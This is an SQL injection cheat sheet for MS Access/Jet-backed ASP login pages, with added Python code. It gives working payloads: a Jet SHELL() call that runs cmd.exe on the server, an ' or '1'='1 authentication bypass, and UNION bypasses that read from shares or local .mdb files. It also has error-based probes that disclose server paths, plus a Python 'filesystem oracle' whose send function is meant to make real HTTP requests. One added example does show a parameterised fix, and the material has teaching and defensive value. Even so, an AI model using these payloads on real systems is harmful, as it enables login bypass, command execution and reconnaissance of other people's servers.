============================================================================
% Access SQL Injection
% brett.moore_at_security-assessment.com
============================================================================
Nothing new here, move along..
****************************************************************************
% MS Access system tables
****************************************************************************
****************************************************************************
% MS Access command execution, (older versions only)
****************************************************************************
[Auth Page Script]
user = request("user")
pass = request("pass")
Set Conn = Server.CreateObject("ADODB.Connection")
Set Rs = Server.CreateObject("ADODB.Recordset")
Conn.Open dsn
SQL = "SELECT * FROM users where pass='" & pass & "' and user='" & user & "'"
rs.open sql,conn
if rs.eof and rs.bof then
' Access Denied
else
' Access Allowed
end if
[Auth Page Bypass]
user = |SHELL("cmd.exe /c dir > c:\test.txt")|
pass = test
[Shell Notes]
Jet expands text between | characters as a VBA expression while it processes the statement, so the SHELL() call runs in the security context of the web server process regardless of what the rest of the query returns. Later Jet releases refuse SHELL() and similar functions inside queries (sandbox mode), hence older versions only.
****************************************************************************
% Auth Bypass, Basic
****************************************************************************
[Auth Page Script]
user = request("user")
pass = request("pass")
Set Conn = Server.CreateObject("ADODB.Connection")
Set Rs = Server.CreateObject("ADODB.Recordset")
Conn.Open dsn
SQL = "SELECT * FROM users where pass='" & pass & "' and user='" & user & "'"
rs.open sql,conn
if rs.eof and rs.bof then
' Access Denied
else
' Access Allowed
end if
[Auth Page Bypass]
user = ' or '1'='1
pass = test
****************************************************************************
% Auth Bypass, Simple
****************************************************************************
[Auth Page Script]
user = request("user")
pass = request("pass")
Set Conn = Server.CreateObject("ADODB.Connection")
Set Rs = Server.CreateObject("ADODB.Recordset")
Conn.Open dsn
SQL = "SELECT user,pass FROM users where user='" & user & "'"
rs.open sql,conn
if rs.eof and rs.bof then
' Access Denied
else
if (rs("pass") = pass) then
' Access Allowed
else
' Access Denied
end if
end if
[Auth Page Bypass Using Shares]
user = ' union select name,password from table1 in '\\share\test\test.mdb
pass = the password stored in \\share\test\test.mdb
[Auth Page Bypass Local mdbs]
user = ' union select '0test','0test' from customers in 'C:\winnt\Help\iisHelp\iis\htm\tutorial\eecustmr.mdb
pass = 0test
[Union Notes]
Remember that with a UNION the sort order can decide which record comes first: Jet drops duplicates and returns the combined rows sorted, so when the script only examines the first record, choose injected values that sort ahead of the real ones (the leading 0 in '0test'). The closing quote the script appends terminates the path literal of the IN clause, which is why the injected path is left unterminated.
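Added example (not from the original page, and not the author's code): the two login scripts above, the Basic one that accepts any row and the Simple one that compares the first row's password in script, rebuilt in Python against an in-memory SQLite table so the page's payloads can be run offline, next to a parameterised version that is not bypassable. The users rows are constructed sample data; SQLite has no Jet IN 'path' clause, so the Simple payload is trimmed of its "from customers in 'C:\...mdb" tail and the script's trailing quote closes the last injected literal instead of the path.

```python
import sqlite3

# Constructed stand-in for the Access "users" table the page's ASP queries
# (sample data, not from the original page).
SAMPLE_USERS = [("admin", "S3cret!"), ("brett", "letmein")]


def fresh_db():
    """In-memory SQLite database with the page's users(user, pass) layout."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (user TEXT, pass TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_USERS)
    return con


def build_basic_sql(user, pw):
    # Same concatenation as the 'Basic' script:
    #   "SELECT * FROM users where pass='" & pass & "' and user='" & user & "'"
    return "SELECT * FROM users where pass='" + pw + "' and user='" + user + "'"


def vulnerable_basic(con, user, pw):
    """'Basic' script: access is allowed if the query returns any row.
    With user = ' or '1'='1 the WHERE clause becomes
    (pass='test' and user='') or '1'='1', which is true for every row."""
    return len(con.execute(build_basic_sql(user, pw)).fetchall()) > 0


def build_simple_sql(user):
    # Same concatenation as the 'Simple' script:
    #   "SELECT user,pass FROM users where user='" & user & "'"
    return "SELECT user,pass FROM users where user='" + user + "'"


def vulnerable_simple(con, user, pw):
    """'Simple' script: fetch the row by user name, then compare the stored
    password in script. Only the FIRST row is examined, so a UNION that
    contributes a row with attacker-chosen (user, pass) values wins as long
    as that row comes first (Jet returns UNION results sorted, hence the
    page's leading 0 in '0test')."""
    rows = con.execute(build_simple_sql(user)).fetchall()
    if not rows:
        return False
    return rows[0][1] == pw


def hardened(con, user, pw):
    """Parameterised form: user and pw are bound as values by the driver,
    so no input can close the literal or append a UNION."""
    row = con.execute(
        "SELECT 1 FROM users WHERE user=? AND pass=?", (user, pw)
    ).fetchone()
    return row is not None


if __name__ == "__main__":
    con = fresh_db()
    # Payloads from the page; the Simple one is trimmed as described above.
    print(build_basic_sql("' or '1'='1", "test"))
    print(vulnerable_basic(con, "' or '1'='1", "test"))
    print(vulnerable_simple(con, "' union select '0test','0test", "0test"))
    print(hardened(con, "' or '1'='1", "test"))
```

The Simple script is the more interesting failure: it never compares the supplied password against the database at all, only against whatever row the query hands back first, so the attacker only needs to control that row. Binding parameters removes both problems, because the user value can no longer change the shape of the statement.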
****************************************************************************
% System Path Disclosure
****************************************************************************
[Sql String]
user = test' union select name from msysobjects in '.
[ODBC Response]
Microsoft OLE DB Provider for ODBC Drivers (0x80004005)
[Microsoft][ODBC Microsoft Access Driver] The Microsoft Jet database engine cannot open the file 'C:\WINNT\system32'. It is already opened exclusively by another user, or you need permission to view its data.
[Path Notes]
Jet resolves the relative path '.' against the current directory of the web server process and echoes the result back in the error, which is what discloses the system path.
****************************************************************************
% Verify File Exists
****************************************************************************
[Sql String - non-existent file]
user = test' union select name from msysobjects in '\proof
[ODBC Response]
Microsoft OLE DB Provider for ODBC Drivers (0x80004005)
[Microsoft][ODBC Microsoft Access Driver] Could not find file 'C:\proof'.
[Sql String - existing file]
user = test' union select name from msysobjects in '\proof.txt
[ODBC Response]
Microsoft OLE DB Provider for ODBC Drivers (0x80004005)
[Microsoft][ODBC Microsoft Access Driver] Unrecognized database format
****************************************************************************
% Verify Path Exists
****************************************************************************
[Sql String - non-existent path]
user = test' union select name from msysobjects in '\nopath\sqlerr
[ODBC Response]
Microsoft OLE DB Provider for ODBC Drivers (0x80004005)
[Microsoft][ODBC Microsoft Access Driver] 'C:\nopath\sqlerr' is not a valid path. Make sure that the path name is spelled correctly and that you are connected to the server on which the file resides.
[Sql String - existing path]
user = test' union select name from msysobjects in '\inetpub\sqlerr
[ODBC Response]
Microsoft OLE DB Provider for ODBC Drivers (0x80004005)
[Microsoft][ODBC Microsoft Access Driver] Could not find file
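Added example (not from the original page, and not the author's code) covering the three probing sections above, System Path Disclosure, Verify File Exists and Verify Path Exists: the IN 'path' probe and the four distinct Jet errors it produces turned into a small filesystem oracle. The response strings are constructed from the page's [ODBC Response] blocks; simulated_send is a hypothetical stand-in for the HTTP request a real run would make.

```python
import re

# Fragments of the Jet/ODBC errors transcribed on the page, tested in this
# order, with what each one reveals about the path handed to the IN clause.
PROBE_SIGNATURES = [
    (re.compile(r"is not a valid path"), "directory missing"),
    (re.compile(r"Could not find file"), "file missing"),
    (re.compile(r"Unrecognized database format"), "file exists (not a Jet database)"),
    (re.compile(r"cannot open the file"), "directory, or file locked"),
]

# Constructed responses, copied from the page's [ODBC Response] blocks, keyed
# by the path injected into the IN clause. Relative paths resolve on the
# server: '.' is the web server's current directory and '\proof' is the root
# of that directory's drive.
SAMPLE_RESPONSES = {
    ".": "[Microsoft][ODBC Microsoft Access Driver] The Microsoft Jet database "
         "engine cannot open the file 'C:\\WINNT\\system32'. It is already opened "
         "exclusively by another user, or you need permission to view its data.",
    "\\proof": "[Microsoft][ODBC Microsoft Access Driver] Could not find file 'C:\\proof'.",
    "\\proof.txt": "[Microsoft][ODBC Microsoft Access Driver] Unrecognized database format",
    "\\nopath\\sqlerr": "[Microsoft][ODBC Microsoft Access Driver] 'C:\\nopath\\sqlerr' "
                        "is not a valid path. Make sure that the path name is spelled correctly.",
}


def build_probe(path):
    """The page's probe: close the user literal and UNION in a SELECT from
    msysobjects sourced from the database at PATH. The vulnerable script
    appends the closing quote, so PATH is left unterminated here."""
    return "test' union select name from msysobjects in '" + path


def classify(response):
    """Map the error text returned for a probe to what it says about PATH."""
    for pattern, meaning in PROBE_SIGNATURES:
        if pattern.search(response):
            return meaning
    return "unknown (no Jet error in response)"


def disclosed_path(response):
    """Absolute path Jet echoes back, showing how the server resolved the
    relative path we sent; None if the response names no path."""
    m = re.search(r"'([A-Za-z]:\\[^']*)'", response)
    return m.group(1) if m else None


def probe(path, send):
    """One round of the oracle: SEND takes the injected user value and
    returns the response body (a real run would do the HTTP request)."""
    return classify(send(build_probe(path)))


def simulated_send(payload):
    """Hypothetical transport that answers from SAMPLE_RESPONSES."""
    injected_path = payload.split(" in '", 1)[1]
    return SAMPLE_RESPONSES.get(injected_path, "200 OK, login page")


if __name__ == "__main__":
    for p in (".", "\\proof", "\\proof.txt", "\\nopath\\sqlerr", "\\inetpub"):
        print(p, "->", probe(p, simulated_send))
    print(disclosed_path(SAMPLE_RESPONSES["."]))
```

The order of the signatures matters only in that each response carries one of the phrases; the useful distinction is between "not a valid path" (the directory is absent), "Could not find file" (directory present, file absent) and "Unrecognized database format" (the file is there but is not an .mdb), which together let an attacker walk the server's filesystem one name at a time.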